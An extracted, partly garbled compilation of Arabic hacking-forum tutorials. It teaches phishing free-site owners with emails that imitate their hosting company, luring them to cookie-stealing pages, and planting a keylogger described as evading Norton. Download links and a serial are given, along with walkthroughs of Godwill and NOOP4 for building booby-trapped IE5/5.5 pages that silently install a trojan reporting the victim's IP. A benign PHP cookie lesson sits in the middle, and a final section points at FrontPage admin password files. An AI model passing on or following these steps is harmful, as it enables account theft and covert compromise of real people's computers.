                                                                                             ‫ثانيا=-‬

           ‫عليك معرفه بعض بيانات صاحب الموقع مثل االيميل..الخ وتستطيع التوصل له ببعض الطرق=-‬

                                                                                             ‫ثالثا=-‬

                                         ‫عليك اوال ايجاد االكواد االزمه لسرقه الكوكيز من المتصفح=-‬



                                                                                       ‫لنــبدأ الشر ح‬

 ‫النقطه االولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه‬
   ‫المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار االكسبلور‬
     ‫المناسب لتصفح الموقع=المناسب لتصميمه=نفس االصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها‬
                                                                         ‫الختراق المواقع المجانيه‬

    ‫واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه‬
 ‫الكوكيز((ساضعها هنا الحقا))واالن بعدما حصلت على هذه االكواد تضعها في صفحه وتحاول جذب الضحيه‬
                                                                  ‫للتوجه لها وهناك عده طرق‬

               ‫-1تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق‬
‫عنده((هههههههه حب مصلحه))وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد‬


            ‫-2مثال تحدد نوعيه الشركه الى مقدمه االستضافه المجانيه للموقع فمثال اذا كان عنوان الموقع‬
                                                               ‫/‪http://www.name.8m.com‬‬

      ‫فهذا معناه ان الموقع مقدم من شركه فري سيرفر‪ FreeServerS‬وتستطيع معرفه النطاق المحدده‬
         ‫بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه((0....5‪m.s‬الخ‬

    ‫وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم‬
      ‫وتغيير محتوى الرساله((طبعا بالعنقليزي))وارسال رساله منه تتطلب منه فتح موقع((موقعك الى فيه‬
‫الكود))مثال لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع‬


                                              ‫851‬
                                                                            ‫الشركه وسيفتح الموقع حاال‬

‫واذا لم يضع ايميله فهناك طريقه وهى انك مثال تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني‬
   ‫مثال تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك((وهو للمره المليون اقلكم الموقع‬
    ‫الى فيه الكود))او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع‬
                                                                         ‫بالثغرات وهو صعب جدا جدا‬

                                                                          ‫النقطه الثالثه وهي الكوكيز=-‬

   ‫يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه االكواد الخاصه بالمتصفحات مع طريقه‬
                                              ‫التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك‬



                              ‫طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفح 5.5 ‪IE 5 IE‬‬



     ‫هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ((راجع درس "سهوله اختراق‬
                                                                          ‫المواقع المجانيه"))‬

      ‫اوال لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في‬
 ‫الكيبوردواليكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل‬
                                                                                ‫الى جهازه,,,,‬

 ‫اوال قم بتحميل برنامج0002‪ keykey‬وهذا البرنامج يسجل كل شي بالكيبورد واالشياء الى كنت تعمل بها‬
   ‫ويرسلها على االيميل وانا مجربه واليستطيع النورتون الجديد واالزرار الثالثه اللغاء العمليات النشطه في‬
                                                                                   ‫النظام ايقافه ووصلته‬

                                          ‫‪http://www.mikkotech.com/kk2000pro.exe‬‬

                                                                                         ‫والسيلاير نمبر‬

                                              ‫92-9‪SN: K100-43-109-0-793218E876A4C‬‬

 ‫والبرنامج سهل جدا وال يحتاج لشر ح واذا اردتم شرحه كلمونيواالن بعدما جهزت ملف الباتش بهذا البرنامج‬
‫قم بتحميل برنامج‪godwill‬وهو البرنامج الخاص اللغام الموقع على انترنت اكسبلور5 و((5.5 هذه هي سر‬
                                                                                    ‫المهنه))ووصلته‬

                                  ‫‪http://www.thecorpz.org/activex/gwpackage.zip‬‬



                      ‫====================الشــــر ح=====================‬




                                  ‫انا لن اقوم بعمل شر ح بالصور وهذا شر ح بسيط للبرنامج النه سهل جدا‬



                                                ‫951‬
                                                       ‫عندما تفتح البرنامج ستظهر لك لوحه اختار منها‬

                                              ‫‪enter‬في االسفل وستظهر لك القائمه والذى يهمنا منها‬

                                              ‫‪Upx‬وهذا لتشفير الباتش((اظننا خرجنا عن موضوعنا))‬

  ‫‪Html‬وكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار‬
                                                                                       ‫منها‬

               ‫‪General options‬وستظهر لك مربع عرض الصفحات الملغومه وهذا شر ح سريع لها‬

      ‫‪enter exe file‬ومن هنا تضع الباتش الى سويته بشرط اال يكون حجمه كبير جدا((هل تفيدنا هذه‬
                                                                             ‫المعلومه في شئ))‬

         ‫‪enter html‬الستعراض صفحه من جهازك ثم الغامها وحط عالمه صح جانب ‪use default‬‬
                                                     ‫‪page‬ليقوم البرنامج بعمل صفحه جديده‬

 ‫وفي االسفل‪HTA File Name‬وهنا تضع اسم الصفحه وبعد االنتهاء من ذلك نختار كلمه‪ Done‬ليقوم‬
                                 ‫البرنامج بعمل الصفحه((وسيكون مكانها في نفس مجلد البرنامج))‬




                                                                       ‫وارجو ان يكون الشر ح واضحا‬

                                                 ‫واذا واجهت مشكله مع البرنامج توجه الى هذا الموقع‬

                                ‫‪http://www.thecorpz.org/html/activesploits.html‬‬

                   ‫===================نهايه الشـــر ح====================‬



      ‫وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل‬
‫التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك االن انت تنتظر في بريدك الى حطيته في‬
 ‫التروجان المعلومات عن الضحيه مثل((الموقع وااليميل,,الخ))وهذه الطريقه تنفع ايضا لسرقه االشتراكات‬
                                                                      ‫واساميه في المنتديات وايميله.‬

                                            ‫انتهى،،،‬




                        ‫" درس مفصل عن الكوكيز "‬

                                              ‫061‬
                                                                  ‫<منقول من منتديات هاكرز فلسطين>‬

                                                                             ‫<الكاتب:‪> Linux Girl‬‬


                                                                                            ‫مقدمة‬
 ‫تعد الكعكات ( الـ ) ‪ cookies‬من الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ، فبواسطتها ستتمكن من‬
                                                 ‫معرفة هل قام المتصفح بزيارة موقعك من قبل ام ال..‬

                                       ‫في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها...‬

                                                                                       ‫اقسام الدرس :‬
                                                                                  ‫2- معلومات عامة .‬
                                                                 ‫6- زراعة الكعكات على جهاز العميل .‬
                                                                   ‫3- قراءة الكعكات من جهاز العميل .‬
                                                                    ‫.- تطبيق : تخصيص لون الخلفية.‬

                                                                                       ‫معلومات عامة‬

                                                                         ‫-ما هي ملفات الكوكيز ؟‬
 ‫ملفات الكوكيز عبارة عن ملفات نصية ، تقوم المواقع التي تزورها بإيداعها على القرص الصلب في جهازك‬
 ‫، وتحتوي هذه الملفات النصية على معلومات تتيح للموقع الذي أودعها أن يسترجعها عند الحاجة ، أي عند‬
                                                                           ‫زيارتك المقبلة للموقع .‬

       ‫وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع آلخر ، ولكن ليس بإمكان هذه المواقع‬
     ‫استرجاع أي معلومات إضافية عنك أو عن جهازك ، باستثناء تلك المعلومات المخزنة في الملف النصي‬
 ‫الخاص بها ، والتي تم إرسالها من قبل الموقع ، وبذلك ال تستطيع هذه المواقع االطالع على مضمون ملفات‬
                                                   ‫الكوكيز األخرى ، أو أي ملفات خاصة على جهازك .‬

                                                             ‫-كيف يتم إيداع ملفات الكوكيز على جهازك ؟‬
     ‫يرسل المتصفح ، عند إدخالك عنوان موقع في شريط العناوين ، طلبا ً إلى الموقع الذي حددته ، متضمنا ً‬
       ‫عنوان ‪ IP‬الخاص به ، ونوع المتصفح الذي تستخدمه ، ونظام التشغيل الذي يدير جهازك . تخزن هذه‬
 ‫المعلومات في ملفات خاصة بالمزود ، ‪ Log Files‬وال عالقة للكوكيز بالمعلومات التي يتم إرسالها . وفي‬
   ‫الوقت ذاته يبحث المتصفح عن ملفات كوكيز ، التي تخص الموقع المطلوب ، فإذا وجدها يتم إرسالها مع‬
 ‫طلب مشاهدة الموقع ، وإذا لم توجد ، فإن الموقع سيدرك أن هذه زيارتك األولى إليه ، فيقوم بإرسال ملفات‬
                                                                       ‫الكوكيز إلى جهازك لتخزن عليه .‬

 ‫وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة‬
‫الموقع . يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ، بحيث يجري حذفها مباشرة عند إغالقك المتصفح‬
      ‫، ولكن معظمها وتسمى "ملفات الكوكيز المثابرة"، يتم تخزينها لفترة محددة على القرص الصلب لحين‬
‫انتهاء صالحيتها وقد تدوم صالحيتها مدة أشهر أو حتى سنوات . أما بعض ملفات الكوكيز التي تعرض تاريخ‬
                                                   ‫ُ َّ‬                ‫ُ‬
  ‫صالحية لتاريخ سابق ، فإنها تحذف مباشرة وال تخزن على قرصك الصلب . وتعود المعلومات المخزنة في‬
 ‫ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ، وقد تعمم بعض الشركات الكبرى ملفات الكوكيز التي‬
 ‫تصدرها على جميع مزوداتها ، لتنسيق المعلومات المتضمنة ، ولكي ال تصدر كل من مزوداتها ملفات كوكيز‬
                                              ‫للمستخدم ذاته ، عند زيارته لصفحات مختلفة في الموقع.‬

                                                                               ‫-مكونات ملف الكوكيز :‬
           ‫يتكون عادة من عدة اجزاء هي اسم الملف ، قيمته ، تاريخ انتهاء مفعوله ، الموقع المالك له ...‬

                                                                      ‫زراعة الكعكات على جهاز العميل‬



                                               ‫161‬
                                                                     ‫أوال : كيف تزرع ملفات الكعكات :‬
                                        ‫يتم ذلك باستخدام الدالة ‪ setcookie‬و تعريفها بالشكل التالي :‬

                                                                                              ‫:‪code‬‬



                  ‫‪boolean setcookie ( string name [, string value [, int expire‬‬

                                    ‫)]]]]]‪[, string path [, string domain [, int secure‬‬




                                                           ‫تهمنا المدخالت الثالث االولى و هي :‬
   ‫: ‪name‬اي اسم الكعكة ... فبامكانك ارسال اكثر من كعكة الى متصفح واحد و عندها يصبح االسم هو‬
                                                                        ‫الطريقة الوحيدة للتمييز .‬

‫: ‪value‬القيمة ... فقط قيم نصية ... ال يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ... لكن انتبه بامكانك‬
 ‫وضع مصفوفة لكن بطريقة اخرى ... ؟ كيف ؟ : استخدم الدالة ‪ serialize‬لتحويل اي متغير في بي اتش‬
                          ‫بي الى شكل نصي و من ثم استخدم ‪ unserialize‬العادته الى الشكل الطبيعي.‬

‫: ‪expire‬اي عدد الثواني من بدية عصر اليونكس ( 2 يناير 2182 ) و التي بعدها سيقوم المتصفح على‬
                                                    ‫جهاز المستخدم بحذف الكعكة ... و هنا ثالث حاالت:‬
  ‫>--أوالً : أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكة‬
                                                          ‫على جهاز العميل و تحذف عند انقضاء المدة .‬
 ‫>--ثانيا ً : أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها ال يقوم المتصفح على‬
                ‫جهاز العميل بتخزينها و اذا وجدت كعكة بنفس االسم فانه يحذفها حتى لو لم تنتهي المدة .‬
    ‫>--ثالثا ً : إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع .‬

                                                                                               ‫مثال :‬
                                                                                              ‫:‪code‬‬

                                                                                                 ‫?<‬

                  ‫;)0063+)(‪setcookie('site','http://www.palhackerz.com/',time‬‬

                                                                                                 ‫>?‬



 ‫من الدوال المفيدة دالة ‪ time‬و التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس‬
                                                                            ‫(2 يناير 2182).‬

                                                                   ‫ثانيا كيف تحذف او تعدل كعكة:‬
    ‫لكي تحذف كعكة عليك أن ترسل كعكة بنفس االسم و خالية القيمة و ذات وقت اقل من الوقت على جهاز‬
                                                                                      ‫المستخدم‬



                                               ‫261‬
                                                                                               ‫مثال:‬
                                                                                             ‫:‪code‬‬

                                                                                                ‫?<‬

                                                      ‫;)000063-)(‪setcookie('site','',time‬‬

                                                                                                ‫>?‬



                                                                                           ‫مالحظات :‬
            ‫2- عندما تحدد زمنا ماضيا ً اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل .‬
                                               ‫6- لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد .‬

                                                                                 ‫مالحظة مهمة :‬
‫يجب ان تستدعي الدالة ‪ setcookie‬قبل أن ترسل اي شيء الى المتصفح .. فمثال الكود التالي لن ينجح :‬
                                                                                       ‫:‪code‬‬

                                                                                          ‫>‪<html‬‬

                                                                                         ‫>‪<body‬‬

                                                                                               ‫?<‬

                                ‫;)00002+)(‪setcookie('site','palhackerz.com',time‬‬

                                       ‫;"‪echo " Alfjr.com : the best islamic forum‬‬

                                                                                                ‫>?‬

                                                                                        ‫>‪</body‬‬

                                                                                         ‫>‪</html‬‬




              ‫بل لو كان هنالك مجرد سطر فارغ قبل عالمة البداية ? >فلن تعمل الدالة... ‪setcookie‬‬

                                                              ‫المثال السابق كان من الممكن ان يكون :‬
                                                                                          ‫:‪code‬‬

                           ‫;)00002+)(‪<? setcookie('site','palhackerz.com',time‬‬

                                                                                                ‫>?‬

                                                                                          ‫>‪<html‬‬



                                              ‫361‬
                                                                                          ‫>‪<body‬‬

                    ‫>? ;"‪<? echo " palhackerz.com : the best Hacking forum‬‬

                                                                                         ‫>‪</body‬‬

                                                                                          ‫>‪</html‬‬




                                                                       ‫قراءة الكعكات من جهاز العميل‬

                                                             ‫-كيف تستقبل المتغيرات من الكعكة :‬
                                        ‫كما قلنا بانه بامكانك ارسال اكثر من كعكة الى متصفح واحد ..‬
                                                               ‫ِ‬
 ‫عندما يطلب المستخدم من متصفحه صفحة على موقعك فان المتصفح يقوم بارسال جميع الكعكات التي قمت‬
      ‫انت بزراعتها عند المستخدم ‪ ... PHP‬تسهل عليك قراءة هذه الكعكات و تخزنها في مصفوفة اسمها‬
 ‫$_‪COOKIE‬و هي مصفوفة من النوع ‪ Associative Arrays‬بحيث ان المفتا ح هو اسم الكعكة و‬
                                                                 ‫القيمة قيمة الكعكة كما ارسلتها .‬

                                                                                              ‫مثال :‬
                                                                                             ‫:‪code‬‬

                                                                                                 ‫?<‬

                                                                  ‫;]'‪echo $_COOKIE['site‬‬

                                                                                                 ‫>?‬



                                                                                        ‫و هذه تطبع :‬
                                                                                             ‫:‪code‬‬

                                                                              ‫‪palhackerz.com‬‬

                                                                    ‫تطبيق : تخصيص لون الخلفية‬
‫كمثال بسيط دعنا نقوم بانشاء موقع مبسط و نستخدم الكعكات لكي نحفظ لون الخلفية المحببة الى الشخص ..‬

                                                                                         ‫-ماذا لدينا ؟‬
                                                      ‫2- الملف : ‪ user.php‬يقوم الملف بعمليتين :‬
                                                        ‫>--االولى : تحديد اللون الذي اختاره الزائر .‬
                                        ‫>--الثانية : عرض نموذج اختيار الللون و حفظ اللون المختار‬

           ‫6- الملف ‪ index.php‬إحدى صفحات الموقع و التي تستفيد من خدمات الملف. ‪user.php‬‬

                                                                       ‫وإليك الكود الخاص بكل ملف :‬
                                                                            ‫2- الملف: ‪user.php‬‬
                                                                                         ‫:‪code‬‬


                                              ‫461‬
                                                            <?

                                       /*-----------------------

                 Cookies-Based Background Selector..

       Created By : "Rasha"<rasha@h4palestine.com>

                                  For : h4palestine.com

                                     -------------------------*/



                               function display_form(){

                                                            ?>

                                                      <html>

                                                     <body>

                             <!-- Color setting Form -->

            <form name=color_select method="GET">

 <INPUT type="hidden" name="do" value="set_color">

            <INPUT name="color" type="text" value="

                              <? echo get_color(); ?>">

              > "‫<احفظ اللون‬INPUT type="submit" value="

                                                  </FORM>

                            <!-- Color Clearing Form -->

             <form name=color_clear method="GET">

<INPUT type="hidden" name="do" value="clear_color">

       > "‫<ال تتذكر لوني المفضل‬INPUT type="submit" value="

                                                  </FORM>

                                                            <?




                 165
                                              }



                          function set_color(){

                                global $_GET;

setcookie('color',$_GET['color'],time()+36000);

                 header('Location:index.php');



                                              }



                          function get_color(){

                            global $_COOKIE;

                  if(isset($_COOKIE['color'])){

                     return $_COOKIE['color'];

                                         }else{

                            return "#FFFFFF";

                                              }

                                              }



                        function clear_color(){

setcookie('color',$_GET['color'],time()-36000);

                 header('Location:index.php');

                                              }



                                   // selection



        166
                                                                ‫{)'‪if ($do=='display_form‬‬

                                                                            ‫;)(‪display_form‬‬

                                                             ‫{)"‪}elseif ($do=="set_color‬‬

                                                                                 ‫;)(‪set_color‬‬

                                                          ‫{)"‪}elseif ($do=="clear_color‬‬

                                                                               ‫;)(‪clear_color‬‬

                                                                                                ‫}‬

                                                                                              ‫>?‬



                              ‫-الدالة االولى ‪ display_form‬تقوم فقط بعرض نموذج اختيار اللون .‬
 ‫-الدالة الثانية ‪ set_color‬تقوم بحفظ اللون المختار في كعكة و ترجع المستخدم الى الصفحة الرئيسية .‬
‫-الدالة الثالثة ‪ get_color‬ترجع قيمة اللون من الكعكة و اذا لم يكن هنالك قيمة فانها ترجع لون افتراضي‬
                                                                                   ‫وهو االبيض .‬
                   ‫-الدالة الرابعة ‪ clear_color‬تقوم بمسح الكعكة بالطريقة التي ذكرناها في الدرس .‬

                                                                 ‫6- ملف الـ : ‪index.php‬‬
                       ‫ملف عادي جداً اال انه يطلب الدالة ‪ get_color‬من ملف ‪ user.php‬كما يلي :‬
                                                                                     ‫:‪code‬‬

                                                                                       ‫>‪<html‬‬

                                         ‫;)'‪<BODY bgcolor="<? include('user.php‬‬

                                                                   ‫>">? )(‪echo get_color‬‬

                                                                     ‫>1‪<h‬مرحبا بك ..... >1‪</h‬‬

                                                                                           ‫>‪<br‬‬

                                                                 ‫يمكنك تخصيص لون الخلفية من هنا‬

                                                                                           ‫>‪<br‬‬



                  ‫>"‪<a href="user.php?do=display_form‬صفحة تخصيص اللون >‪</a‬‬

                                                                                      ‫>‪</body‬‬



                                              ‫761‬
                                                  ‫>‪</html‬‬



                      ‫انتهى،،،‬




‫" شرح برنامج األسطورة ‪ God Will‬في تلغيم الصفحات "‬

                                    ‫<منقول من منتدى ابن مصر>‬
                                          ‫<الكاتب: بو محرل>‬


                       ‫861‬
                                                                            ‫كل ما يلزمنا هو :‬
                                                        ‫**ملف الــ ‪ html‬الذي تريد تلغيمه.‬
                   ‫**ملف الباتش الذي تريد وضعه في الصفحة.( يجب أن يكون أقل من .3 بايت )‬
                                              ‫**برنامج األسطورة ‪ Godwill‬لتلغيم الصفحة.‬
                                                         ‫و تجد هذا البرنامج في اللينك التالي:‬

                        ‫‪http://www.geocities.com/love2002_il/godwill16.zip‬‬

                                                                ‫و السيلاير نامبر‪: tlsecurity‬‬

                                                                                       ‫لنبدأ:‬
‫بعد تجهيز ملف الــ ‪ html‬المراد تلغيمه، و ملف الباتش، شغل برنامج ‪ Godwill‬بعد تحميل، و ستجد‬
                                                                    ‫أمامك النافذة التالية...‬




                                            ‫اضغط على زر ‪ html‬لتجد نفسك في النافذة التالية...‬




                                         ‫961‬
  ‫اضغط على الخيار ‪ General Options‬لتنتقل للنافذة التالية...‬
                                                           ‫!‪Error‬‬




‫اتبع التعليمات الموجودة في هذه النافذة، و من ثم اضغط الزر‪Done‬‬


          ‫071‬
                                                                   ‫بعدها ستنتقل إلى النافذة التالية...‬




                                                                                    ‫اضغط زر‪Gen‬‬
‫سيظهر لك في مجلد البرنامج ملف له نفس اإلسم الذي وضعته في الحقل رقم 3 ...‪ enter Output‬و هذا‬
                                                                     ‫الملف يمثل الصفحة الملغومة...‬
                                        ‫قم بتحميل الصفحة على إحدى المواقع المستضيفة للصفحات مثل‬
                  ‫/‪http://www.tripod.lycos.co.uk‬و احتفظ بعنوان صفحتك الملغومة جيدا...‬
‫عند فتح الضحية لصفحتك الملغومة... سيقوم الباتش بتحميل نفسه بنفسه بدون أن يحس الضحية بأي شيء‬
‫( طبعا إال إذا كان لديه ) ‪ zone Alarm‬و عند إعادته لتشغيل الكمبيوتر، سيقوم الباتش بتشغيل نفسه... و‬
                            ‫ستصلك رساله منه برقم أي بي جهاز الضحية و رقم البورت الذي تم فتحه...‬
                                                                    ‫و هون بقى ، أنت بتعرف شغلك.‬

                                            ‫انتهى،،،‬




                                              ‫171‬
                                        ‫ا‬
‫" وداعً للبرنامج األسطورة ومرحبا ببرنامج4‪" NOOP‬‬

                                                               ‫<منقول من منتدى إعصار>‬

                                                      ‫<الكاتب:¤§.®‪> ¤§.®MoHfOx‬‬

                                      ‫وهو ال يرتقى إلى مستوى ‪ god will‬لكنه خفيف جدا .‬

                                        ‫وال يجعلك ترتبط لحجم معين مثل برنامج.. ‪godwill‬‬

                  ‫هذا البرنامج من اجل دمج بالباتش وتهيئة علي اساس انه صفحه علي النت‬
                                                        ‫اسم البرنامج هو0.4 ‪noob‬‬
‫من ااجل عيون الجوكر والجميع=======================================‬
                                    ‫=============================‬
                                                                       ‫2- البرنامج‬
         ‫الصوره توضح ما هوالشر ح عند ضغطك علي البرنامج وفتحه سوف تاتي هذه الشاشه‬




                         ‫=======================================‬
                                   ‫=============================‬
                                           ‫‪2 layout‬للبرنامج:::====>>>>‬


                                            ‫هو خاص بتكوينات الصفحه وينقسم الي 2 اجزاء‬

                              ‫6- خاصه بتكوين الصفحه لمستخدمي 5 ‪Internet Explorer‬‬
                             ‫3- خاص بتكوين الصفحه لمستخدمي5.5‪Internet Explorer‬‬
                                        ‫.و5 هما الي تحديد نوع الملفات المستخدمه في الدمج‬
                                  ‫2- هي ما سوف يقوم البرنامج بدمجه مع الصفحه من ملفات‬




                                     ‫271‬
‫==================================================‬
                                  ‫===================‬
                  ‫‪3 executable file‬الختيار الباتش :::====>>>>‬
                              ‫1- لتحديد مكان الباتش من علي الجهاز‬




                                                   ‫0- للبداء في تكوين الباتش‬
            ‫=======================================‬
                          ‫=============================‬
     ‫8- هو اخر المطاف هو انهاء االعدادت لتكوين الباتش مع الصفحه:::====>>>>‬




                            ‫371‬
‫وفي نهايه عمل البرنامج يعطي لك المكان الذي تريد ان يحفظ في الصفحه المدموجه.‬




                                                           ‫وصلة البرنامج...‬




                       ‫انتهى،،،‬




                        ‫471‬
‫" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "‬

                                                                                           ‫<منقول>‬

                                                                 ‫<الكاتب: . ) ‪>T.O.L. ( DeXXa‬‬

                                                        ‫ما الذي يجب أن تعرفه قبل قراءة هذا الدرس :‬

                                                                        ‫* االلمام باالنجليزية .‬
             ‫* قراءة المزيد عن الـ ‪ FrontPage Server Extensions‬و ليس كيفية اختراقه .‬
                                ‫* كيفية التعامل مع برنامج ‪. Microsoft Office FrontPage‬‬
                                                         ‫* كيفية التعامل مع الـ ‪. CHMOD‬‬
                                                            ‫* كيفية التعامل مع الـ ‪. Telnet‬‬
                                                     ‫* كيفية التعامل مع بروتوكول ‪. HTTP‬‬
                                            ‫* كيفية التعامل مع قواعد البيانات العالئقية ‪. SQL‬‬
          ‫* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم ‪Server Side Scripting‬‬
                                                                             ‫‪. Language‬‬

‫و اذكر أخيراً بأني اؤمن بأن المخترق ما هو إال انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و‬
                                                                     ‫ليس انسان همه هو معرفة القليل‬
  ‫من األمور التي تساعده في التخريب و العبث بما تعب به اآلخرون و تضييع الوقت في الدردشة و التسكع‬
                                                                 ‫بمقاهي االنترنت ، و لذا فافترض بأن‬
                                        ‫ما أقوله سيكون واضحا ً و ال يحتاج لـ ‪. Screen Capture‬‬

                                                                              ‫@ خريطة الموضوع :‬

                                                         ‫. ما الذي ستسفيده عند قراءة الموضوع ؟‬
                                                                                      ‫. مقدمة‬
                                            ‫. ما هو الـ ‪ FrontPage Server Extensions‬؟‬
                                      ‫. ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬
                                          ‫. كيفية االتصال بـ ‪FrontPage Extension Server‬‬
                                              ‫. كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ال‬
                                                              ‫. كيفية استغالله ليصبح في صالحك‬


                                                        ‫@ ما الذي ستستفيده عند قراءتك للموضوع ؟‬

                                      ‫* ستعرف ما هو الـ ‪. FrontPage Server Extensions‬‬
                                                                                       ‫* آلية عمله .‬
                                                         ‫* كيفية جمع المعلومات الخاصة بأي موقع .‬
                                         ‫* بعض الطرق لالستفادة منه عند االتصال بالخادم الخاص به .‬

                                                                                        ‫@ مقدمة :‬

‫تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعمالئها ، فتجدهم يقدمون العروض و التخفيضات‬
                                                            ‫الرضاء العمالء مثل دعم لـ ‪ PHP‬و‬
                                                      ‫‪ CGI‬و ‪ Perl‬و ‪ SSL‬و ‪ FTP‬و ‪. SQL‬‬

‫و بالنسبة لمدارء المواقع ‪ Webmasters‬فإن البرنامج المفضل لهم لتصميم مواقعهم هو ‪Microsoft‬‬
                                             ‫‪ Office FrontPage‬و الذي كما هو مبين يأتي‬


                                              ‫571‬
‫مع حزمة ‪ ، Office‬اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ، و لذا تقدم‬
                                                                  ‫شركات التسكين دعم كامل للبرنامج .‬

                                              ‫@ ما هو الـ ‪ FrontPage Server Extensions‬؟‬

                                  ‫( مالحظة : سأتكلم حاليا ً عن الحزم التي أتت بعد حزمة االصدار الثاني )‬

    ‫هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم ‪ Server‬الخاص بشركة التسكين التي لها قالبية‬
                                                                             ‫لدعم بعض الخصائص .‬

                                                           ‫و عند التثبيت يجب انشاء عدة مجلدات منها :‬

                                                                                          ‫/_‪private‬‬
                                                                                          ‫/_‪vti_bin‬‬
                                                                                          ‫/_‪vti_cnf‬‬
                                                                                          ‫/_‪vti_log‬‬
                                                                                          ‫/_‪vti_pvt‬‬
                                                                                           ‫/_‪vti_txt‬‬

                                                                   ‫و سأتكلم عن وظيفة كل مجلد يهمنا :‬

                                                                                ‫* المجلد _‪: vti_bin‬‬

                                                                         ‫و يتواجد بداخله مجلدان هما :‬

                                                  ‫( مالحظة : النقطتان تشيران إلى المجلد _‪) vti_bin‬‬

                                                                                      ‫../_‪/vti_adm‬‬
                                                                                        ‫../_‪/vti_aut‬‬

‫الثاني ال يهمنا بقدر ما يهم المجلد األول اذ أنه الخاص بالمشرف وال تستطيع االستفادة منه اذا لم تحصل على‬
                                                                            ‫كلمة المرور الخاصة به .‬
                                                                                ‫كما يوجد ملفان هما :‬

                                                                                     ‫../‪shtml.exe‬‬
                                                                                   ‫../‪fpcount.exe‬‬

                                                                                ‫* المجلد _‪: vti_pvt‬‬

                                           ‫و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية :‬

‫- الملف ‪ : service.pwd‬و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس ‪DES‬‬
                                                                                                  ‫.‬
                       ‫- الملف ‪ : service.grp‬و فيه يتواجد المعرفين من مشرفين و ‪. authors‬‬
  ‫- ملفي ‪ deptodoc.btr‬و ‪ : doctodep.btr‬و فيه يتواجد مسارات الملفات التي تم تحميلها على‬
                                                    ‫الخادم ، فاذا قمت بتنزيله فتستطيع معرفة الملفات‬
                                                                                ‫الموجودة بالموقع .‬

‫و في الغالب ال تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف .‪ htaccess‬يقوم‬
                                                              ‫بمنع الجميع ( المالك و المجموعة و‬


                                                ‫671‬
                                                                ‫الزوار ) من معاينة المجلد و محتوياته .‬

     ‫( مالحظة : ان عدم وضع أي صالحية على المجلدال يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية )‬

                                                                                ‫* المجلد _‪: private‬‬

                                                    ‫و يتواجد بداخله ملف واحد فقط هو .‪. htaccess‬‬

                                     ‫@ ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬

    ‫يعتمد االتصال بين العميل و الـ ‪ FrontPage Extension Server‬على بروتوكول الـ ‪. HTTP‬‬

‫فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ ‪ FrontPage‬فانه يتم ارسال طلب ‪ Request‬للخادم‬
                                         ‫ثم يمرره الخادم بالـ ‪FrontPage Extension Server‬‬
   ‫و الذي يمرره بالتالي ببرمجيات الخادم مثل ‪ ، fpcount.exe‬و من ثم يكرر تمريره مرة أخرى إلى الـ‬
                                            ‫‪ Extension Server‬و إلى الخادم و يظهر المخرجات‬
                                               ‫لـ العميل ، علما ً ان هذه االتصاالت تتم عبر جدار نار .‬

                                        ‫@ كيفية االتصال بـ ‪: FrontPage Extension Server‬‬

 ‫كما ذكرنا سابقا ً ان أغلب شركات التسكين تسعى لراحة العمالء ، فتجدها تدعم خدمة الـ ‪ FrontPage‬و‬
                                                             ‫ذلك لتحميل الصفحات للموقع علما ً بأنها‬
